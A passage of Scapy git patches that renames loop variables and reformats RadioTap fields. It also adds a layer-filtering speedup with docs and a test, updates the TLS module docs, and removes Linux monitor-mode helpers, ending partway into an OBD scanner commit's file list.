+215,9 @@ def layers(self): class CommandsList(list): def __repr__(self): s = [] - for l in sorted(self, key=lambda x: x.__name__): - doc = l.__doc__.split("\n")[0] if l.__doc__ else "--" - s.append("%-20s: %s" % (l.__name__, doc)) + for li in sorted(self, key=lambda x: x.__name__): + doc = li.__doc__.split("\n")[0] if li.__doc__ else "--" + s.append("%-20s: %s" % (li.__name__, doc)) return "\n".join(s) def register(self, cmd): diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index bca8c8ea188..e40f7af5cf7 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -94,15 +94,15 @@ def _update(self, pkt): self._update_internal_state(pkt) def _update_log(self, pkt): - for l in pkt.layers(): - if hasattr(l, "get_log"): - log_key, log_value = l.get_log(pkt) + for layer in pkt.layers(): + if hasattr(layer, "get_log"): + log_key, log_value = layer.get_log(pkt) self.log[log_key].append((pkt.time, log_value)) def _update_internal_state(self, pkt): - for l in pkt.layers(): - if hasattr(l, "modifies_ecu_state"): - l.modifies_ecu_state(pkt, self) + for layer in pkt.layers(): + if hasattr(layer, "modifies_ecu_state"): + layer.modifies_ecu_state(pkt, self) def _update_supported_responses(self, pkt): self._unanswered_packets += PacketList([pkt]) @@ -328,9 +328,9 @@ def make_reply(self, req): continue for r in resp.responses: - for l in r.layers(): - if hasattr(l, "modifies_ecu_state"): - l.modifies_ecu_state(r, self.ecu_state) + for layer in r.layers(): + if hasattr(layer, "modifies_ecu_state"): + layer.modifies_ecu_state(r, self.ecu_state) return resp.responses diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 1a0c20067f7..d7a744fb441 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -2615,13 +2615,13 @@ def _convert_a_header_to_a_h2_header(self, hdr_name, hdr_value, is_sensitive, sh ) ) - def _parse_header_line(self, l): + def _parse_header_line(self, line): # type: (str) -> Union[Tuple[None, None], Tuple[str, str]] if self._regexp is None: self._regexp = re.compile(br'^(?::([a-z\-0-9]+)|([a-z\-0-9]+):)\s+(.+)$') # noqa: E501 - hdr_line = l.rstrip() + hdr_line = line.rstrip() grp = self._regexp.match(hdr_line) if grp is None or len(grp.groups()) != 3: diff --git a/scapy/contrib/openflow.py b/scapy/contrib/openflow.py index f51d456c943..15409185732 100755 --- a/scapy/contrib/openflow.py +++ b/scapy/contrib/openflow.py @@ -494,7 +494,7 @@ class OFPPacketQueue(Packet): ShortField("len", None), XShortField("pad", 0), PacketListField("properties", [], OFPQT, - length_from=lambda pkt:pkt.len - 8)] # noqa: E501 + length_from=lambda pkt:pkt.len - 8)] def extract_padding(self, s): return b"", s diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index c7307045bfb..b3b452318c2 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -2103,7 +2103,7 @@ class OFPTFlowMod(_ofp_header): XShortField("pad", 0), MatchField("match"), PacketListField("instructions", [], OFPIT, - length_from=lambda pkt:pkt.len - 48 - (pkt.match.len + (8 - pkt.match.len % 8) % 8))] # noqa: E501 + length_from=lambda pkt:pkt.len - 48 - (pkt.match.len + (8 - pkt.match.len % 8) % 8))] # noqa: E501 # include match padding to match.len diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 0072a3437cb..02f6a35b9b1 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -269,15 +269,11 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.Flags), # Rate ConditionalField( - _RadiotapReversePadField( - ByteField("Rate", 0) - ), + _RadiotapReversePadField(ByteField("Rate", 0)), lambda pkt: pkt.present and pkt.present.Rate), # Channel ConditionalField( - _RadiotapReversePadField( - LEShortField("ChannelFrequency", 0) - ), + _RadiotapReversePadField(LEShortField("ChannelFrequency", 0)), lambda pkt: pkt.present and pkt.present.Channel), ConditionalField( FlagsField("ChannelFlags", None, -16, _rt_channelflags), @@ -285,48 +281,37 @@ class RadioTap(Packet): # dBm_AntSignal ConditionalField( _RadiotapReversePadField( - ScalingField("dBm_AntSignal", 0, - offset=-256, unit="dBm", - fmt="B") - ), + ScalingField("dBm_AntSignal", 0, offset=-256, + unit="dBm", fmt="B")), lambda pkt: pkt.present and pkt.present.dBm_AntSignal), # dBm_AntNoise ConditionalField( _RadiotapReversePadField( - ScalingField("dBm_AntNoise", 0, - offset=-256, unit="dBm", - fmt="B") - ), + ScalingField("dBm_AntNoise", 0, offset=-256, + unit="dBm", fmt="B")), lambda pkt: pkt.present and pkt.present.dBm_AntNoise), # Lock_Quality ConditionalField( - _RadiotapReversePadField( - LEShortField("Lock_Quality", 0), - ), + _RadiotapReversePadField(LEShortField("Lock_Quality", 0)), lambda pkt: pkt.present and pkt.present.Lock_Quality), # Antenna ConditionalField( - _RadiotapReversePadField( - ByteField("Antenna", 0) - ), + _RadiotapReversePadField(ByteField("Antenna", 0)), lambda pkt: pkt.present and pkt.present.Antenna), # RX Flags ConditionalField( _RadiotapReversePadField( - FlagsField("RXFlags", None, -16, _rt_rxflags) - ), - lambda pkt: pkt.present and pkt.present.RXFlags), + FlagsField("RXFlags", None, -16, _rt_rxflags)), + lambda pkt: pkt.present and pkt.present.RXFlags), # TX Flags ConditionalField( _RadiotapReversePadField( - FlagsField("TXFlags", None, -16, _rt_txflags) - ), - lambda pkt: pkt.present and pkt.present.TXFlags), + FlagsField("TXFlags", None, -16, _rt_txflags)), + lambda pkt: pkt.present and pkt.present.TXFlags), # ChannelPlus ConditionalField( _RadiotapReversePadField( - FlagsField("ChannelPlusFlags", None, -32, _rt_channelflags2) - ), + FlagsField("ChannelPlusFlags", None, -32, _rt_channelflags2)), lambda pkt: pkt.present and pkt.present.ChannelPlus), ConditionalField( LEShortField("ChannelPlusFrequency", 0), @@ -337,8 +322,7 @@ class RadioTap(Packet): # MCS ConditionalField( _RadiotapReversePadField( - FlagsField("knownMCS", None, -8, _rt_knownmcs) - ), + FlagsField("knownMCS", None, -8, _rt_knownmcs)), lambda pkt: pkt.present and pkt.present.MCS), ConditionalField( BitField("Ness_LSB", 0, 1), @@ -364,8 +348,7 @@ class RadioTap(Packet): # A_MPDU ConditionalField( _RadiotapReversePadField( - LEIntField("A_MPDU_ref", 0) - ), + LEIntField("A_MPDU_ref", 0)), lambda pkt: pkt.present and pkt.present.A_MPDU), ConditionalField( FlagsField("A_MPDU_flags", None, -32, _rt_a_mpdu_flags), @@ -373,8 +356,7 @@ class RadioTap(Packet): # VHT ConditionalField( _RadiotapReversePadField( - FlagsField("KnownVHT", None, -16, _rt_knownvht) - ), + FlagsField("KnownVHT", None, -16, _rt_knownvht)), lambda pkt: pkt.present and pkt.present.VHT), ConditionalField( FlagsField("PresentVHT", None, -8, _rt_presentvht), @@ -394,8 +376,7 @@ class RadioTap(Packet): # timestamp ConditionalField( _RadiotapReversePadField( - LELongField("timestamp", 0) - ), + LELongField("timestamp", 0)), lambda pkt: pkt.present and pkt.present.timestamp), ConditionalField( LEShortField("ts_accuracy", 0), @@ -409,8 +390,7 @@ class RadioTap(Packet): # HE - XXX not complete ConditionalField( _RadiotapReversePadField( - ShortField("he_data1", 0) - ), + ShortField("he_data1", 0)), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( ShortField("he_data2", 0), @@ -430,8 +410,7 @@ class RadioTap(Packet): # HE_MU ConditionalField( _RadiotapReversePadField( - LEShortField("hemu_flags1", 0) - ), + LEShortField("hemu_flags1", 0)), lambda pkt: pkt.present and pkt.present.HE_MU), ConditionalField( LEShortField("hemu_flags2", 0), @@ -447,8 +426,7 @@ class RadioTap(Packet): # HE_MU_other_user ConditionalField( _RadiotapReversePadField( - LEShortField("hemuou_per_user_1", 0x7fff) - ), + LEShortField("hemuou_per_user_1", 0x7fff)), lambda pkt: pkt.present and pkt.present.HE_MU_other_user), ConditionalField( LEShortField("hemuou_per_user_2", 0x003f), @@ -463,8 +441,7 @@ class RadioTap(Packet): # L_SIG ConditionalField( _RadiotapReversePadField( - FlagsField("lsig_data1", 0, -16, ["rate", "length"]) - ), + FlagsField("lsig_data1", 0, -16, ["rate", "length"])), lambda pkt: pkt.present and pkt.present.L_SIG), ConditionalField( BitField("lsig_length", 0, 12), @@ -473,8 +450,7 @@ class RadioTap(Packet): BitField("lsig_rate", 0, 4), lambda pkt: pkt.present and pkt.present.L_SIG), # Remaining - StrLenField('notdecoded', "", - length_from=lambda pkt: 0) + StrLenField('notdecoded', "", length_from=lambda pkt: 0) ] def guess_payload_class(self, payload): diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index d0f28cf6505..4896c7656cf 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -198,13 +198,11 @@ class EAP(Packet): ConditionalField(ByteEnumField("type", 0, eap_types), lambda pkt:pkt.code not in [ EAP.SUCCESS, EAP.FAILURE]), - ConditionalField(FieldListField( - "desired_auth_types", - [], - ByteEnumField("auth_type", 0, eap_types), - length_from=lambda pkt: pkt.len - 4 - ), - lambda pkt:pkt.code == EAP.RESPONSE and pkt.type == 3), # noqa: E501 + ConditionalField( + FieldListField("desired_auth_types", [], + ByteEnumField("auth_type", 0, eap_types), + length_from=lambda pkt: pkt.len - 4), + lambda pkt:pkt.code == EAP.RESPONSE and pkt.type == 3), ConditionalField( StrLenField("identity", '', length_from=lambda pkt: pkt.len - 5), lambda pkt: pkt.code == EAP.RESPONSE and hasattr(pkt, 'type') and pkt.type == 1), # noqa: E501 diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 29c3c2b71f3..cc99f05f724 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1198,9 +1198,9 @@ def get_trace(self): m = min(x for x, y in six.iteritems(k) if y[1]) except ValueError: continue - for l in list(k): # use list(): k is modified in the loop - if l > m: - del k[l] + for li in list(k): # use list(): k is modified in the loop + if li > m: + del k[li] return trace def trace3D(self, join=True): diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 4300e520e6f..29af3707721 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -858,7 +858,7 @@ class IPv6ExtHdrHopByHop(_IPv6ExtHdr): adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, - length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 + length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 0}} @@ -871,7 +871,7 @@ class IPv6ExtHdrDestOpt(_IPv6ExtHdr): adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, - length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 + length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 60}} @@ -3005,7 +3005,7 @@ class MIP6MH_BRR(_MobilityHeader): ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 8, - length_from=lambda pkt: 8 * pkt.len)] + length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): @@ -3026,7 +3026,7 @@ class MIP6MH_HoTI(_MobilityHeader): StrFixedLenField("cookie", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 16, - length_from=lambda pkt: 8 * (pkt.len - 1))] # noqa: E501 + length_from=lambda pkt: 8 * (pkt.len - 1))] overload_fields = {IPv6: {"nh": 135}} def hashret(self): @@ -3053,7 +3053,7 @@ class MIP6MH_HoT(_MobilityHeader): StrFixedLenField("token", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 24, - length_from=lambda pkt: 8 * (pkt.len - 2))] # noqa: E501 + length_from=lambda pkt: 8 * (pkt.len - 2))] overload_fields = {IPv6: {"nh": 135}} def hashret(self): @@ -3098,7 +3098,7 @@ class MIP6MH_BU(_MobilityHeader): LifetimeField("mhtime", 3), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, - length_from=lambda pkt: 8 * pkt.len - 4)] # noqa: E501 + length_from=lambda pkt: 8 * pkt.len - 4)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() @@ -3124,7 +3124,7 @@ class MIP6MH_BA(_MobilityHeader): XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, - length_from=lambda pkt: 8 * pkt.len - 4)] # noqa: E501 + length_from=lambda pkt: 8 * pkt.len - 4)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() @@ -3157,7 +3157,7 @@ class MIP6MH_BE(_MobilityHeader): ByteField("reserved", 0), IP6Field("ha", "::"), _OptionsField("options", [], MIP6OptUnknown, 24, - length_from=lambda pkt: 8 * (pkt.len - 2))] # noqa: E501 + length_from=lambda pkt: 8 * (pkt.len - 2))] overload_fields = {IPv6: {"nh": 135}} @@ -3237,9 +3237,9 @@ def get_trace(self): m = min(x for x, y in six.iteritems(k) if y[1]) except ValueError: continue - for l in list(k): # use list(): k is modified in the loop - if l > m: - del k[l] + for li in list(k): # use list(): k is modified in the loop + if li > m: + del k[li] return trace diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index 27a40cb89a3..a758f7d166b 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -758,8 +758,8 @@ def sixlowpan_fragment(packet, datagram_tag=1): if len(str_packet) <= MAX_SIZE: return [packet] - def chunks(l, n): - return [l[i:i + n] for i in range(0, len(l), n)] + def chunks(li, n): + return [li[i:i + n] for i in range(0, len(li), n)] new_packet = chunks(str_packet, MAX_SIZE) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 4a2251b23fb..cd04b420a24 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -989,8 +989,8 @@ def should_handle_ClientData(self): print("> Received: %r" % p.data) recv_data = p.data lines = recv_data.split(b"\n") - for l in lines: - if l.startswith(b"stop_server"): + for line in lines: + if line.startswith(b"stop_server"): raise self.CLOSE_NOTIFY_FINAL() elif isinstance(p, TLSAlert): print("> Received: %r" % p) @@ -1318,8 +1318,8 @@ def sslv2_should_handle_ClientData(self): print("> Received: %r" % p) lines = cli_data.split(b"\n") - for l in lines: - if l.startswith(b"stop_server"): + for line in lines: + if line.startswith(b"stop_server"): raise self.SSLv2_CLOSE_NOTIFY_FINAL() if cli_data.startswith(b"GET / HTTP/1.1"): diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index 3644c2f8884..484970c51d2 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -1297,7 +1297,7 @@ class SSL_CK_DES_192_EDE3_CBC_WITH_MD5(_GenericCipherSuite): _tls_cipher_suites[0x5600] = "TLS_FALLBACK_SCSV" -def get_usable_ciphersuites(l, kx): +def get_usable_ciphersuites(li, kx): """ From a list of proposed ciphersuites, this function returns a list of usable cipher suites, i.e. for which key exchange, cipher and hash @@ -1306,7 +1306,7 @@ def get_usable_ciphersuites(l, kx): function matches the one of the proposal. """ res = [] - for c in l: + for c in li: if c in _tls_cipher_suites_cls: ciph = _tls_cipher_suites_cls[c] if ciph.usable: diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index df818b21189..17d703bee26 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -1050,8 +1050,8 @@ def find(self, session): def __repr__(self): res = [("First endpoint", "Second endpoint", "Session ID")] - for l in six.itervalues(self.sessions): - for s in l: + for li in six.itervalues(self.sessions): + for s in li: src = "%s[%d]" % (s.ipsrc, s.sport) dst = "%s[%d]" % (s.ipdst, s.dport) sid = repr(s.sid) diff --git a/scapy/main.py b/scapy/main.py index eb14272a689..0cc1b1ef9fe 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -249,15 +249,15 @@ def list_contrib(name=None, # type: Optional[str] mod = mod[:-3] desc = {"description": None, "status": None, "name": mod} with io.open(f, errors="replace") as fd: - for l in fd: - if l[0] != "#": + for line in fd: + if line[0] != "#": continue - p = l.find("scapy.contrib.") + p = line.find("scapy.contrib.") if p >= 0: p += 14 - q = l.find("=", p) - key = l[p:q].strip() - value = l[q + 1:].strip() + q = line.find("=", p) + key = line[p:q].strip() + value = line[q + 1:].strip() desc[key] = value if desc["status"] == "skip": break diff --git a/scapy/pipetool.py b/scapy/pipetool.py index af160dcaa7b..401667b38f0 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -89,11 +89,11 @@ def add_one_pipe(self, pipe): self.active_sinks.add(pipe) def get_pipe_list(self, pipe): - def flatten(p, l): - l.add(p) + def flatten(p, li): + li.add(p) for q in p.sources | p.sinks | p.high_sources | p.high_sinks: - if q not in l: - flatten(q, l) + if q not in li: + flatten(q, li) pl = set() flatten(pipe, pl) return pl diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 30ad842b37e..c2ceb316d2a 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -319,38 +319,39 @@ def parse_campaign_file(campaign_file): test = None testnb = 0 - for l in campaign_file.readlines(): - if l[0] == '#': + for line in campaign_file.readlines(): + if line[0] == '#': continue - if l[0] == "~": - (test or testset or test_campaign).add_keywords(l[1:].split()) - elif l[0] == "%": - test_campaign.title = l[1:].strip() - elif l[0] == "+": - testset = TestSet(l[1:].strip()) + if line[0] == "~": + (test or testset or test_campaign).add_keywords(line[1:].split()) + elif line[0] == "%": + test_campaign.title = line[1:].strip() + elif line[0] == "+": + testset = TestSet(line[1:].strip()) test_campaign.add_testset(testset) test = None - elif l[0] == "=": - test = UnitTest(l[1:].strip()) + elif line[0] == "=": + test = UnitTest(line[1:].strip()) test.num = testnb testnb += 1 if testset is None: error_m = "Please create a test set (i.e. '+' section)." raise getopt.GetoptError(error_m) testset.add_test(test) - elif l[0] == "*": + elif line[0] == "*": if test is not None: - test.comments += l[1:] + test.comments += line[1:] elif testset is not None: - testset.comments += l[1:] + testset.comments += line[1:] else: - test_campaign.headcomments += l[1:] + test_campaign.headcomments += line[1:] else: if test is None: - if l.strip(): - print("Unknown content [%s]" % l.strip(), file=sys.stderr) + if line.strip(): + print("Unknown content [%s]" % line.strip(), + file=sys.stderr) else: - test.test += l + test.test += line return test_campaign @@ -402,9 +403,9 @@ def docs_campaign(test_campaign): print("%s" % t.comments.strip().replace("\n", "")) print() print("Usage example::") - for l in t.test.split('\n'): - if not l.rstrip().endswith('# no_docs'): - print("\t%s" % l) + for line in t.test.split('\n'): + if not line.rstrip().endswith('# no_docs'): + print("\t%s" % line) # COMPUTE CAMPAIGN DIGESTS # diff --git a/scapy/utils.py b/scapy/utils.py index 9177017eb20..8af7bed5a5b 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -482,18 +482,20 @@ def str2mac(s): return ("%02x:" * 6)[:-1] % tuple(s) -def randstring(l): +def randstring(length): """ - Returns a random string of length l (l >= 0) + Returns a random string of length (length >= 0) """ - return b"".join(struct.pack('B', random.randint(0, 255)) for _ in range(l)) + return b"".join(struct.pack('B', random.randint(0, 255)) + for _ in range(length)) -def zerofree_randstring(l): +def zerofree_randstring(length): """ - Returns a random string of length l (l >= 0) without zero in it. + Returns a random string of length (length >= 0) without zero in it. """ - return b"".join(struct.pack('B', random.randint(1, 255)) for _ in range(l)) + return b"".join(struct.pack('B', random.randint(1, 255)) + for _ in range(length)) def strxor(s1, s2): diff --git a/scapy/utils6.py b/scapy/utils6.py index 5dd7b847bf9..1e0375968cd 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -872,14 +872,14 @@ def parse_digit(value, netmask): def __iter__(self): self._parse() - def rec(n, l): + def rec(n, li): sep = ':' if n and n % 2 == 0 else '' if n == 16: - return l + return li return rec(n + 1, [y + sep + '%.2x' % i # faster than '%s%s%.2x' % (y, sep, i) for i in range(*self.parsed[n]) - for y in l]) + for y in li]) return (in6_ptop(addr) for addr in iter(rec(0, ['']))) From 882c910d4b5065fb49980349f200a4c2c74ff40f Mon Sep 17 00:00:00 2001 From: gpotter Date: Mon, 20 Apr 2020 13:17:23 +0200 Subject: [PATCH 0151/1632] Add filtering speedup --- scapy/config.py | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/scapy/config.py b/scapy/config.py index 952ef056667..73aad9a3c34 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -191,6 +191,8 @@ class LayersList(list): def __init__(self): list.__init__(self) self.ldict = {} + self.filtered = False + self._backup_dict = {} def __repr__(self): return "\n".join("%-20s: %s" % (layer.__name__, layer.name) @@ -211,6 +213,29 @@ def layers(self): result.append((lay, doc.strip().split("\n")[0] if doc else lay)) return result + def filter(self, items): + """Disable dissection of unused layers to speed up dissection""" + if self.filtered: + raise ValueError("Already filtered. Please disable it first") + for lay in six.itervalues(self.ldict): + for cls in lay: + if cls not in self._backup_dict: + self._backup_dict[cls] = cls.payload_guess[:] + cls.payload_guess = [ + y for y in cls.payload_guess if y[1] in items + ] + self.filtered = True + + def unfilter(self): + """Re-enable dissection for all layers""" + if not self.filtered: + raise ValueError("Not filtered. Please filter first") + for lay in six.itervalues(self.ldict): + for cls in lay: + cls.payload_guess = self._backup_dict[cls] + self._backup_dict.clear() + self.filtered = False + class CommandsList(list): def __repr__(self): From 0059c35607d21b44f06fa642c7cf51bf201821b3 Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 15 May 2020 23:49:50 +0200 Subject: [PATCH 0152/1632] Filtering doc & test --- doc/scapy/usage.rst | 28 ++++++++++++++++++++++++++++ test/regression.uts | 11 +++++++++++ 2 files changed, 39 insertions(+) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 53030e8180c..ec453aa511a 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1690,6 +1690,34 @@ Discussion __ https://www.wireshark.org __ https://wiki.wireshark.org/ProtocolReference +Performance of Scapy +-------------------- + +Problem +^^^^^^^ + +Scapy dissects slowly and/or misses packets under heavy loads. + +.. note:: + + Please bare in mind that Scapy is not designed to be blazing fast, but rather easily hackable & extensible. The packet model makes it VERY easy to create new layers, compared to pretty much all other alternatives, but comes with a performance cost. Of course, we still do our best to make Scapy as fast as possible, but it's not the absolute main goal. Just a quick disclaimer + +Solution +^^^^^^^^ + +There are quite a few ways of speeding up scapy's dissection. You can use all of them + +- **Using a BPF filter**: The OS is faster than Scapy. If you make the OS filter the packets instead of Scapy, it will only handle a fraction of the load. Use the ``filter=`` argument of the :py:func:`~scapy.sendrecv.sniff` function. +- **By disabling layers you don't use**: If you are not using some layers, why dissect them? You can let Scapy know which layers to dissect and all the others will simply be parsed as ``Raw``. This comes with a great performance boost but requires you to know what you're doing. + +.. code:: python + + # Enable filtering: only Ether, IP and ICMP will be dissected + conf.layers.filter([Ether, IP, ICMP]) + # Disable filtering: restore everything to normal + conf.layers.unfilter() + + OS Fingerprinting ----------------- diff --git a/test/regression.uts b/test/regression.uts index 380b3e44c8e..0e37e0ab0b5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -138,6 +138,17 @@ except: assert not conf.use_bpf += Test layer filtering +~ filter + +pkt = NetflowHeader()/NetflowHeaderV5()/NetflowRecordV5() + +conf.layers.filter([NetflowHeader, NetflowHeaderV5]) +assert NetflowRecordV5 not in NetflowHeader(bytes(pkt)) + +conf.layers.unfilter() +assert NetflowRecordV5 in NetflowHeader(bytes(pkt)) + ########### ########### From 8412f78cce8805a1fbe8c6934e593cc5aa679931 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 13 May 2020 18:53:07 +0200 Subject: [PATCH 0153/1632] Update tls module doc --- scapy/layers/tls/__init__.py | 12 +++--------- 1 file changed, 3 insertions(+), 9 deletions(-) diff --git a/scapy/layers/tls/__init__.py b/scapy/layers/tls/__init__.py index 60b48ef4664..15f8ef29437 100644 --- a/scapy/layers/tls/__init__.py +++ b/scapy/layers/tls/__init__.py @@ -1,6 +1,7 @@ # This file is part of Scapy # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury +# 2019 Romain Perez # This program is published under a GPLv2 license """ @@ -19,7 +20,7 @@ - RSA & ECDSA keys sign/verify methods. - TLS records and sublayers (handshake...) parsing/building. Works with - versions SSLv2 to TLS 1.2. This may be enhanced by a TLS context. For + versions SSLv2 to TLS 1.3. This may be enhanced by a TLS context. For instance, if Scapy reads a ServerHello with version TLS 1.2 and a cipher suite using AES, it will assume the presence of IVs prepending the data. See test/tls.uts for real examples. @@ -44,7 +45,7 @@ - Reading a TLS handshake between a Firefox client and a GitHub server. - - Reading TLS 1.3 handshakes from test vectors of a draft RFC. + - Reading TLS 1.3 handshakes from test vectors of the 8448 RFC. - Reading a SSLv2 handshake between s_client and s_server, without PFS. @@ -57,15 +58,10 @@ - Features to add (or wait for) in the cryptography library: - - X448 from RFC 7748 (no support in openssl yet); - - the compressed EC point format. - - About the automatons: - - Add resumption support, through session IDs or session tickets. - - Add various checks for discrepancies between client and server. Is the ServerHello ciphersuite ok? What about the SKE params? Etc. @@ -81,8 +77,6 @@ - Miscellaneous: - - Enhance PSK and session ticket support. - - Define several Certificate Transparency objects. - Add the extended master secret and encrypt-then-mac logic. From 45cd76b875e25b69e7f15d27615df85c1c3a048f Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 15 May 2020 23:58:19 +0200 Subject: [PATCH 0154/1632] Remove unused functions on linux --- doc/scapy/usage.rst | 5 +++-- scapy/arch/linux.py | 54 ++------------------------------------------- 2 files changed, 5 insertions(+), 54 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 53030e8180c..16589877f37 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1490,9 +1490,10 @@ Wireless sniffing The following command will display information similar to most wireless sniffers:: ->>> sniff(iface="ath0", monitor=True, prn=lambda x:x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\t%PrismHeader.channel%\t%Dot11Beacon.cap%}")) +>>> sniff(iface="ath0", prn=lambda x:x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\t%PrismHeader.channel%\t%Dot11Beacon.cap%}")) -Note the `monitor=True` argument, which only work from scapy>2.4.0 (2.4.0dev+), that is cross-platform. It will in work in most cases (Windows, OSX), but might require you to manually toggle monitor mode. +.. note:: + On Windows and OSX, you will need to also use `monitor=True`, which only works on scapy>2.4.0 (2.4.0dev+). This might require you to manually toggle monitor mode. The above command will produce output similar to the one below:: diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index fd979f0b9a5..642e3ebd7fb 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -17,7 +17,6 @@ import socket import struct import time -import re import subprocess @@ -384,54 +383,6 @@ def _flush_fd(fd): break -def get_iface_mode(iface): - """Return the interface mode. - params: - - iface: the iwconfig interface - """ - p = subprocess.Popen(["iwconfig", iface], stdout=subprocess.PIPE, - stderr=subprocess.STDOUT) - output, err = p.communicate() - match = re.search(br"mode:([a-zA-Z]*)", output.lower()) - if match: - return plain_str(match.group(1)) - return "unknown" - - -def set_iface_monitor(iface, monitor): - """Sets the monitor mode (or remove it) from an interface. - params: - - iface: the iwconfig interface - - monitor: True if the interface should be set in monitor mode, - False if it should be in managed mode - """ - mode = get_iface_mode(iface) - if mode == "unknown": - warning("Could not parse iwconfig !") - current_monitor = mode == "monitor" - if monitor == current_monitor: - # Already correct - return True - s_mode = "monitor" if monitor else "managed" - - def _check_call(commands): - p = subprocess.Popen(commands, - stderr=subprocess.PIPE, - stdout=subprocess.PIPE) - stdout, stderr = p.communicate() - if p.returncode != 0: - warning("%s failed !" % " ".join(commands)) - return False - return True - if not _check_call(["ifconfig", iface, "down"]): - return False - if not _check_call(["iwconfig", iface, "mode", s_mode]): - return False - if not _check_call(["ifconfig", iface, "up"]): - return False - return True - - class L2Socket(SuperSocket): desc = "read/write packets at layer 2 using Linux PF_PACKET sockets" @@ -441,9 +392,8 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, self.type = type self.promisc = conf.sniff_promisc if promisc is None else promisc if monitor is not None: - warning( - "The monitor argument is ineffective on native linux sockets." - " Use set_iface_monitor instead." + log_runtime.info( + "The 'monitor' argument has no effect on native linux sockets." ) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 if not nofilter: From 982c4fcd37246a5326367005b8efd72a072648ca Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 13 Nov 2019 17:12:38 +0100 Subject: [PATCH 0155/1632] Implementation of OBD scanner and preparations for futher protocol scanners --- scapy/ansmachine.py | 3 +- scapy/contrib/automotive/ecu.py | 79 ++++- scapy/contrib/automotive/enumerator.py | 392 +++++++++++++++++++++ scapy/contrib/automotive/obd/scanner.py | 449 ++++++++++++------------ scapy/contrib/isotp.py | 5 